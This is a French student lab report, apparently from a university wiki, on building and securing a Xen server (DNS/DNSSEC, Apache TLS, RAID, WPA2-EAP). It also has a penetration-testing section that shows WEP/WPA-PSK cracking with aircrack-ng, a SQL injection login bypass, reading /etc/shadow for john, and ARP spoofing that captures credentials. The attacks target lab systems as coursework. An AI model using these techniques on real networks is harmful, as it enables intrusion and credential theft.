Lors d'un host -t any, nous obtenons :&lt;br /&gt;
    morillon.website has RRSIG record NSEC 5 2 86400 20210113121019 20201214121019 52512 morillon.website. nIhQAoZ568EQQ9eOl5H11UqnE49RW62604sey8RqnpVV1GWO4Rp5fkX4 7aOmVVljXVpnFvBfcfVYI430VHGKJUjUwSgSQSFFrLsKqETAp2PZFosH qEX1ml7c6U5SGpWdlkMtisLCxYfYn8/r2R25MZtrZsIsW543Zx6kXSzP 4CI=&lt;br /&gt;
    morillon.website has NSEC record mail.morillon.website. NS SOA MX RRSIG NSEC DNSKEY&lt;br /&gt;
    morillon.website has RRSIG record MX 5 2 86400 20210113121019 20201214121019 52512 morillon.website. GYKvgQe+6dfZkrevA3TXyJS82o77qWlRl/pNsE0I41Ku7FT1RgifPDll kXnqRl9G70iT4cRB9dNa/F+7RTcvY276in44lMkAzRlMWARG8+hYBhhq 5nvNN4kJpDZ7dKIpTc/wMu7SGiMZYKKrJOeK/pdarxI4ZHyqhDMiCW/X 9hE=&lt;br /&gt;
    morillon.website mail is handled by 100 mail.morillon.website.&lt;br /&gt;
    morillon.website has RRSIG record NS 5 2 86400 20210113121019 20201214121019 52512 morillon.website. RuAS5LH4UEmd+FIjzD522vwJcrGYlNuUuZYsDAFy0JiMGuOse5EKAWOi 01NWxfLAPGCDlj9Dj4QfyxSA+GhIJPEU25kcR44Nv/LQn1FsJZlQT8XM QkUnAXSlchrIlKg+XaSCTGjjfB1rE5Oba7PUwYgQ5CC7C7etvXegp2QV Ju0=&lt;br /&gt;
    morillon.website has RRSIG record SOA 5 2 86400 20210113121019 20201214121019 52512 morillon.website. i+0smnpl1ASGvURvV3lL/BuL6Zw/s3yjslMRUIKbOkE4tM/zgqF5RrTb gHOkj3PcZSSaO31O3vKUz6S0iPo/YWQvdaF0aHDcyvLQgCLiP6vpNwF+ mwOO821Jto39AM+3cuWCsytKECqKH4LoDMxkw/MUi6DJe40eAD8HEf2P 8iQ=&lt;br /&gt;
    morillon.website has SOA record ns1.morillon.website. postmaster.morillon.website. 2020120706 604800 86400 2419200 86400&lt;br /&gt;
    morillon.website has RRSIG record DNSKEY 5 2 3600 20210113121019 20201214121019 52512 morillon.website. VGQyJDSf38xOBJymFK/DYLO/UYPEoIspsqZpPPnX+nPjUdR5Tw3tILPT 5AfZWAChlgQ8AnfLzxum/znpKI66EbeqTHvg1J/FjMBvlsyyLjwqjn6w u7JzquC/fbpq4HsskLFgpl1Z1zNuQAJB9xBGOJR8BpCHBRc8ubp1tUzy I2k=&lt;br /&gt;
    morillon.website has RRSIG record DNSKEY 5 2 3600 20210113121019 20201214121019 59473 morillon.website. Tz3BwfoPt+loiqbWuQnbDdl57L6eXQ+dv+ZvXzcrvCSTXy/UKNRjs39d t6j6krwo4eZk6blXGgDEm93D67AmkQHmus9NYL9VgR0eG/NPHIodozzq aai4jXKwcOnk8O3d/nObyOERvGbnD9znUVGtgiUDCcY7UaXBogewFyCR Zxq69+FdFvmIXwriHHRRiaN/Bf4r/+djB46AcZEpbtvq1475BfJ6qYe/ VxW5odv1wcr9k8Sy/27LMbaHzdX9OWqdYLge3vfBRa8VMW+R57tx+M0p mtmOExUgc3mmnsVLP89L2M85MMTcbaup1RJIG4L33CaYEl9hOiaki4j8 CW5GHg==&lt;br /&gt;
    morillon.website has DNSKEY record 257 3 5 AwEAAfVX0ANdFDmDRKIBUMhso53F9LjZnc3lKHwHZHe3xiyLnFC+rQyc CQH+xg5g0UvDSLtoTFRtMiA4AyY6d8fywjmNFVluu64iDWyZkIVdiZLm XkfDdt4lz2+rxE1IkncbCYKkOk5cwkXYtxR/z/leOyZPX4i8Q1fhMfJG jUzNnZ1dATz0WGTb5qoGU9mEzVOH1WH4SkHc+acXkfBn6MtgR/DNJKDw 5huO3LMuA/ZyfwZU7lHhID97MMdpIwTIjd/nJLCjNY6rUP4OzZka7VjQ n/lOZ2UGMjOn+4QQqKDvmLohUOBsNFyY7PnSvsV9j5riNEZfuBx863QN 0PSBfK9cA4M=&lt;br /&gt;
    morillon.website has DNSKEY record 256 3 5 AwEAAaZUpNecSfAJ70amN3b4lcgpOAKXwbeJRogxxJEaqoSa0meQm6PY ZHAJFkxMMi78X+qVQeZr206VozCjPhysAWK6G45h/yY73Xzw1s0KzLwf L6FOhcn7KWzf2CIm6RfH5hwRLyuDriAaVVdKPxN/CkW9LIXRzm5LWSdz hqsZrhsz&lt;br /&gt;
    morillon.website name server ns6.gandi.net.&lt;br /&gt;
    morillon.website name server ns1.morillon.website.&lt;br /&gt;
&lt;br /&gt;
Cela fonctionne correctement.&lt;br /&gt;
&lt;br /&gt;
===Apache2 et sécurisation du serveur===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser le serveur et accéder à notre site web apache2, ce dernier a besoin d'un certificat.&lt;br /&gt;
&lt;br /&gt;
Pour l'obtenir, nous avons tout d'abord créer un CSR et une private key dans le dossier home du serveur.&lt;br /&gt;
    openssl req -nodes -newkey rsa:2048 -sha256 -keyout morillon.key -out morillon.csr&lt;br /&gt;
&lt;br /&gt;
Et fourni les éléments d'identification de notre serveur (localisation, nom commun, etc.)&lt;br /&gt;
&lt;br /&gt;
Une fois le .csr et le .key créés, nous transmettons à gandi.net le CSR afin de générer un certificat signé.&lt;br /&gt;
&lt;br /&gt;
Nous avons configué notre serveur pour recevoir des mails, pour cela, nous avons installé 2 paquets :&lt;br /&gt;
&lt;br /&gt;
    postfix&lt;br /&gt;
    bsd-mailx&lt;br /&gt;
&lt;br /&gt;
Puis nous avons ajouté un alias dans le fichier /etc/aliases&lt;br /&gt;
    admin:     root&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de renseigner l'adresse du serveur mail dans le fichier DNS /etc/bind/db.morillon.website&lt;br /&gt;
    @     IN    MX 100 mail&lt;br /&gt;
    mail  IN    CNAME ns1&lt;br /&gt;
    ns1   IN    A   *adresse ip publique*&lt;br /&gt;
&lt;br /&gt;
Grâce à&lt;br /&gt;
    mailx&lt;br /&gt;
&lt;br /&gt;
Nous pouvons vérifier la présence de mail sur notre serveur et recevoir la demande d'authentification de gandi pour générer le certificat.&lt;br /&gt;
&lt;br /&gt;
Une fois obtenue, nous avons 4 fichiers : .key (fichier private key) .csr (fichier certificate) .crt (certificat signé) et .pem (liste des certificats accordés aux autorités signant notre certificat)&lt;br /&gt;
&lt;br /&gt;
Nous configurons par la suite apache2 pour utiliser ces certificats, dans le terminal :&lt;br /&gt;
    a2enmod ssl&lt;br /&gt;
    a2enmod headers&lt;br /&gt;
    service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Maintenant, nous créons un fichier de configuration pour notre serveur:&lt;br /&gt;
    touch /etc/apache2/sites-available/morillon.website.conf&lt;br /&gt;
&lt;br /&gt;
Contenant :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         Redirect permanent / https://www.morillon.website&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
    #Pour rediriger automatiquement les connexions http vers https&lt;br /&gt;
    &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
        ServerName morillon.website&lt;br /&gt;
        ServerAlias www.morillon.website&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/morillon.website&amp;quot;&lt;br /&gt;
         &amp;lt;Directory &amp;quot;var/www/morillon.website&amp;quot;&amp;gt;&lt;br /&gt;
            Options +FollowSymLinks&lt;br /&gt;
            AllowOverride all&lt;br /&gt;
            Require all granted&lt;br /&gt;
         &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.morillon.website.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.morillon.website.log combined&lt;br /&gt;
        #Paramètres de base pour notre site&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        SSLCertificateFile &amp;quot;/home/certificates/morillon.website.crt&amp;quot;&lt;br /&gt;
        SSLCertificateKeyFile &amp;quot;/home/certificates/morillon.key&amp;quot;&lt;br /&gt;
        SSLCertificateChainFile &amp;quot;/home/certificates/GandiStandardSSLCA2.pem&amp;quot;&lt;br /&gt;
        #Activation de la sécurité TLS, emplacement des certificats, de la clé privée et des listes de certificats intermédiaires&lt;br /&gt;
        SSLProtocol -ALL +TLSv1 +TLSv1.1 +TLSv1.2&lt;br /&gt;
        SSLHonorCipherOrder On&lt;br /&gt;
        SSLCipherSuite ECDHE-RSA-AES128-SHA256:AES128-GCM-SHA256:HIGH:!MD5:!aNULL:!EDH:!RC4&lt;br /&gt;
        SSLCompression off&lt;br /&gt;
        #Quelques options de sécurité supplémentaires suites aux découvertes sur les failles TLS de 2014&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous avons désactivé les autres sites par défaut :&lt;br /&gt;
    a2dissite 000-default.conf&lt;br /&gt;
    a2dissite default-ssl.conf&lt;br /&gt;
&lt;br /&gt;
Et activons notre site:&lt;br /&gt;
    a2ensite morillon.website.conf&lt;br /&gt;
&lt;br /&gt;
===Encryption Clé USB===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser une clé avec un mot de passe, nous avons utilisé cryptsetup. On s'assure d'abord de partir sur une clé toute propre :&lt;br /&gt;
    fdisk -l&lt;br /&gt;
    #sélection de la clé à formater&lt;br /&gt;
    fdisk /dev/sdb&lt;br /&gt;
    o #creation table MBR&lt;br /&gt;
    n #creation nouvelle partition&lt;br /&gt;
    w #écriture sur la clé&lt;br /&gt;
&lt;br /&gt;
La commande crypsetup utilisée est la suivante :&lt;br /&gt;
    cryptsetup open --type plain /dev/sdb1 encryptedDevice&lt;br /&gt;
    #s'en suit une demande de mdp&lt;br /&gt;
&lt;br /&gt;
Elle monte ensuite dans le dossier ''/dev/mapper'' et il devient possible de la formater :&lt;br /&gt;
    mkfs.ext4 /dev/mapper/encryptedDevice&lt;br /&gt;
&lt;br /&gt;
===Elevation de privilège sur kernel linux===&lt;br /&gt;
&lt;br /&gt;
Pour tester l'élevation de privilège, nous utilisons la faille CVE_2016_0728 qui fonctionne sur les kernels entre 3.6 et 3.18&lt;br /&gt;
Identifié par la team Perception Point&lt;br /&gt;
http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/&lt;br /&gt;
&lt;br /&gt;
Création d'un VM avec KVM d'une debian jessie pour test sur zabeth21.&lt;br /&gt;
&lt;br /&gt;
===Raid 5 Logiciel===&lt;br /&gt;
&lt;br /&gt;
Pour réaliser le raid 5 logiciel, on crée tout d'abord 3 partitions virtuelles via lvcreate:&lt;br /&gt;
    lvcreate -L1G -n JDDTTR5* storage&lt;br /&gt;
&lt;br /&gt;
Ensuite on les lie à la VM dans le fichier /etc/xen/morillon.cfg comme pour les disques home et var.&lt;br /&gt;
&lt;br /&gt;
Après redémarrage de la VM, on installe le paquet mdadm et on crée un raid 5 sur les 3 nouvelles partitions :&lt;br /&gt;
    mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvde /dev/xvdf /dev/xvdg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier la création grâce à :&lt;br /&gt;
    cat /proc/mdstat&lt;br /&gt;
 &lt;br /&gt;
qui nous renvoie :&lt;br /&gt;
    Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
    md0 : active raid5 xvdg[3] xvdf[1] xvde[0]&lt;br /&gt;
         2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Lors de la désactivation d'un des disques du raid, les données restent accessibles par reconstruction de la partie manquante à partir de 2 parties existantes ou d'une partie et d'une clé correspondante.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
&lt;br /&gt;
Le but dans cette étant de permettre à la borne WiFi d'être controlé par WPA2-EAP,&lt;br /&gt;
&lt;br /&gt;
nous avons en sorte que l'identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire&lt;br /&gt;
&lt;br /&gt;
Pour ce faire :&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes connecté par ssh à notre point d'accès&lt;br /&gt;
 ssh root@10.60.100.10 -c aes128-cbc&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis de nous connecter sur le point d'accès wifi-ima5&lt;br /&gt;
&lt;br /&gt;
Une fois dessus nous avons effectué les commandes suivantes :&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc&amp;gt;en&lt;br /&gt;
 wifi-ima5sc# (Après avoir tapé le mot de passe)&lt;br /&gt;
 wifi-ima5sc# config-term&lt;br /&gt;
 wifi-ima5sc(config)# aaa new-model&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group6 group radius_group6&lt;br /&gt;
 wifi-ima5sc(config-sg-radius)# radius-server host 193.48.57.183 auth-port 1812 acct-port 1813 key secret_group6&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group6&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid morillon&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan306&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group6&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group6&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid Guest mode&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 306 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 306 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# ssid morillon&lt;br /&gt;
 &lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.2&lt;br /&gt;
 wifi-ima5sc(config-subif)#encapsulation dot1Q 306&lt;br /&gt;
 wifi-ima5sc(config-subif)#bridge-group 306&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=54196</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=54196"/>
				<updated>2020-11-30T17:17:45Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion  ===&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-2.png|600px|thumb|center|capture de paquets]]&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-3.png|600px|thumb|center|clef trouvée]]&lt;br /&gt;
&lt;br /&gt;
==== Intrusion sur un serveur d’application Web ====&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette intrusion est de réussir à trouver un mot de passe sur le site honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Pour cela, plusieurs techniques ont été utilisées notamment les méthodes d'injection ou d'exploration de système fichiers&lt;br /&gt;
&lt;br /&gt;
La première étape consistait à utitliser la méthode d'injection en tapant sur http://honey.plil.info/ l'instruction &lt;br /&gt;
 Identifiant : 'OR 1=1#&lt;br /&gt;
 Mot de passe : 'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis d'obtenir le mot de passe admin de la page http://honey.plil.info/index.php&lt;br /&gt;
&lt;br /&gt;
 admin	*****	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Une fois connecté avec les identifiants administrateurs que nous venions de récupérer,&lt;br /&gt;
&lt;br /&gt;
nous avons utilisé la technique de parcours de fichier.&lt;br /&gt;
&lt;br /&gt;
On retrouver ainsi en créant le fichier  /etc/phpmyadmin/config-db.php&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis de récupérer le fichier config-db.php&lt;br /&gt;
&lt;br /&gt;
Voici le contenu du fichier :&lt;br /&gt;
&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='*****';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306'; &lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
On disposait ainsi du mot de passe ainsi que de l'identifiant de la page http://honey.plil.info/phpmyadmin/&lt;br /&gt;
&lt;br /&gt;
en clair&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes connectés en root &lt;br /&gt;
&lt;br /&gt;
Et nous avons obtenus le mot de passe au niveau de l'arborescence test/&lt;br /&gt;
&lt;br /&gt;
Arrivé à cette étape nous nous sommes connectés en ssh sur la machine physique&lt;br /&gt;
 ssh rex@honey.plil.info &lt;br /&gt;
 mot de passe : ****&lt;br /&gt;
&lt;br /&gt;
On a installé l'utilitaire shadow&lt;br /&gt;
&lt;br /&gt;
cat /etc/shadow&lt;br /&gt;
touch file&lt;br /&gt;
... Add first line in fil&lt;br /&gt;
.... Uncrypt with john&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Brute-force sur WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
Pour commencer, la carte passe en mode monitor :&lt;br /&gt;
    airmon-ng start wlan0&lt;br /&gt;
&lt;br /&gt;
Puis une analyse des réseaux wifi disponible est effectuée :&lt;br /&gt;
    airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On sélectionne notre réseau wifi (ici kracotte 6) avec son adresse MAC&lt;br /&gt;
    airodump-ng -c 3 --bssid 00:14:1B:60:8C:25 -w /home/pifou/Desktop/kracotte6 wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Handshaked_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
Lorsque le handshake est obtenu, on compare grâce à un dictionnaire et la commande le fichier .cap récupéré: &lt;br /&gt;
     aicrack-ng -a2 -b 00:14:1B:60:8C:25 -w dico.txt kracotte06-02.cap&lt;br /&gt;
&lt;br /&gt;
Pour créer le dictionnaire, on utilise la commande crunch (comme on sait que le mot de passe est sur 8 caractères et forcément un nombre)&lt;br /&gt;
    crunch 8 8 0123456789 -o ./dico.txt&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Aircrack_working_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
Finalement, après un peu moins d'1h d'attente :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Aircrack_done_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
==== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ====&lt;br /&gt;
Dans cette partie nous allons effectuer une attaque de type &amp;quot;homme du milieu&amp;quot; en faisant passé notre ordinateur pour la passerelle.&lt;br /&gt;
&lt;br /&gt;
Nous l'avons réalisé en ces étapes :&lt;br /&gt;
 1. Installation du paquetage dsniff sur notre ordinateur &lt;br /&gt;
 2. Modification du fichier /proc/sys/net/ipv4/ip_forward à 1&lt;br /&gt;
 3. Dans le terminal : arpspoof -i eth0 -t 172.26.145.70 172.26.145.254&lt;br /&gt;
 4. Dans un autre terminal : arpspoof -i eth0 -t 172.26.145.70 172.26.145.254&lt;br /&gt;
 5. Ouverture de wireshark sur l'eeepc et filtrage des paquets capturés sur le type hit&lt;br /&gt;
 6. Ouverture d'un site http (http://fabricarium.polytech-lille.fr)&lt;br /&gt;
 7. Observation sur wireshark des paquets (méthode GET)&lt;br /&gt;
 8. En essayant de nous connecter en remplissant les identifiants, nous avons eu ce résultat :&lt;br /&gt;
&lt;br /&gt;
 892    27.057577298    172.26.145.70    193.48.57.233    HTTP    1118    GET http://fabricarium-old.polytech-lille.fr/ HTTP/1.1&lt;br /&gt;
&lt;br /&gt;
 987    38.734920206    172.26.145.70    193.48.57.233    HTTP    1383    POST http://fabricarium-old.polytech-lille.fr/users/sign_in.json HTTP/1.1  (application/json)&lt;br /&gt;
&lt;br /&gt;
 995    39.815022272    172.26.145.70    193.48.57.233    HTTP    1444    POST http://webmailportal2.polytech-lille.fr/?_task=mail&amp;amp;_action=refresh HTTP/1.1  (application/x-www-form-urlencoded)&lt;br /&gt;
&lt;br /&gt;
 1523    99.814090449    172.26.145.70    193.48.57.233    HTTP    1444    POST http://webmailportal2.polytech-lille.fr/?_task=mail&amp;amp;_action=refresh HTTP/1.1  (application/x-www-form-urlencoded)&lt;br /&gt;
&lt;br /&gt;
 Frame 987: 1383 bytes on wire (11064 bits), 1383 bytes captured (11064 bits) on interface 0&lt;br /&gt;
 Ethernet II, Src: IntelCor_8f:f7:d3 (00:15:17:8f:f7:d3), Dst: HewlettP_01:ed:ce (5c:b9:01:01:ed:ce)&lt;br /&gt;
 Internet Protocol Version 4, Src: 172.26.145.70, Dst: 193.48.57.233&lt;br /&gt;
 Transmission Control Protocol, Src Port: 53876, Dst Port: 3128, Seq: 14532, Ack: 11925, Len: 1317&lt;br /&gt;
 Hypertext Transfer Protocol&lt;br /&gt;
 JavaScript Object Notation: application/json&lt;br /&gt;
    Object&lt;br /&gt;
        Member Key: user&lt;br /&gt;
            Object&lt;br /&gt;
                Member Key: email&lt;br /&gt;
                    String value: mail@mail.com&lt;br /&gt;
                    Key: email&lt;br /&gt;
                Member Key: password&lt;br /&gt;
                    String value: motdepasse&lt;br /&gt;
                    Key: password&lt;br /&gt;
            Key: user&lt;br /&gt;
&lt;br /&gt;
===Connexion de la VM au net===&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications par nos camarades et professeurs sur le serveur, nous avons eu la marche à suivre afin de configurer correctement la VM pour la connecter au web.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons modifié le fichier /etc/network/interfaces pour avoir la configuration suivante :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Screenshot_config_morillon.png ]]&lt;br /&gt;
&lt;br /&gt;
Nous avons donc comme configuration l'adresse web 193.48.57.183 vue par l'extérieur, un routage sur l'adresse 100.64.0.23 sur l'OSPF qui correspond au réseau virtuel via le VLAN 333 et l'adresse routeur 100.64.0.2. Le mot clé src indique que les paquets à destination du 193.x.x.x est à destination de l'ip du VLAN.&lt;br /&gt;
&lt;br /&gt;
Par la suite, une route doit être créée sur l'OSPF pour connecter correctement la VM sur le VLAN au web, une simple commande grâce au minicom :&lt;br /&gt;
    enable&lt;br /&gt;
      conf t&lt;br /&gt;
        vlan 333&lt;br /&gt;
        ip route 193.48.57.183 255.255.255.255 100.64.0.23&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour accéder via ssh à la machine, il suffit de s'y connecter via les identifiants habituels.&lt;br /&gt;
&lt;br /&gt;
===Modification host DNS et configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
====Modification sur gandi.net====&lt;br /&gt;
Afin d'être identifiable sur le net, nous avons besoin d'un DNS sur notre VM.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous créons un glue record sur gandi.net pour morillon avec l'adresse web externe : 193.48.57.183 en attribuant comme nameserver ns1.morillon.website&lt;br /&gt;
&lt;br /&gt;
Ainsi, nous pouvons exporter le DNS sur notre serveur tel que le nameserver 1 est le notre : ns1.morillon.website et le 2, comme adressage de secours : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Malheureusement, bien qu'on ait demandé à gandi d'exporter le nameserver le dimanche 1er novembre vers 12h30, celui-ci n'a pas pris en compte notre demande.&lt;br /&gt;
&lt;br /&gt;
Elle fut redemandé le 2 novembre...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
MàJ du 16/11:&lt;br /&gt;
&lt;br /&gt;
Après vérification, une erreur de type couillon sur le glue record a probablement empêché le bon déroulement de l'opération : l'adresse ip renseignée était 193.57.48.183 au lieu de 193.48.57.183...&lt;br /&gt;
&lt;br /&gt;
MàJ du 30/11:&lt;br /&gt;
&lt;br /&gt;
Migration réussie&lt;br /&gt;
&lt;br /&gt;
====Configuration de bind9====&lt;br /&gt;
&lt;br /&gt;
Après installation&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
nous avons configuré bind9 dans le dossier local de la VM&lt;br /&gt;
    /etc/bind/&lt;br /&gt;
&lt;br /&gt;
Le fichier db.morillon.website a été créé. Nous y avons ajouté les lignes suivantes :&lt;br /&gt;
&lt;br /&gt;
 BIND data file for local loopback interface;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.morillon.website.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.183&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du serveur===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser le serveur et accéder à notre site web apache2, ce dernier a besoin d'un certificat.&lt;br /&gt;
&lt;br /&gt;
Pour l'obtenir, nous avons tout d'abord créer un CSR et une private key dans le dossier home du serveur.&lt;br /&gt;
    openssl req -nodes -newkey rsa:2048 -sha256 -keyout morillon.key -out morillon.csr&lt;br /&gt;
&lt;br /&gt;
Et fourni les éléments d'identification de notre serveur (localisation, nom commun, etc.)&lt;br /&gt;
&lt;br /&gt;
Une fois le .csr et le .key créés, nous transmettons à gandi.net le CSR afin de générer un certificat signé.&lt;br /&gt;
&lt;br /&gt;
Nous avons configué notre serveur pour recevoir des mails, pour cela, nous avons installé 2 paquets :&lt;br /&gt;
&lt;br /&gt;
    postfix&lt;br /&gt;
    bsd-mailx&lt;br /&gt;
&lt;br /&gt;
Puis nous avons ajouté un alias dans le fichier /etc/aliases&lt;br /&gt;
    admin:     root&lt;br /&gt;
&lt;br /&gt;
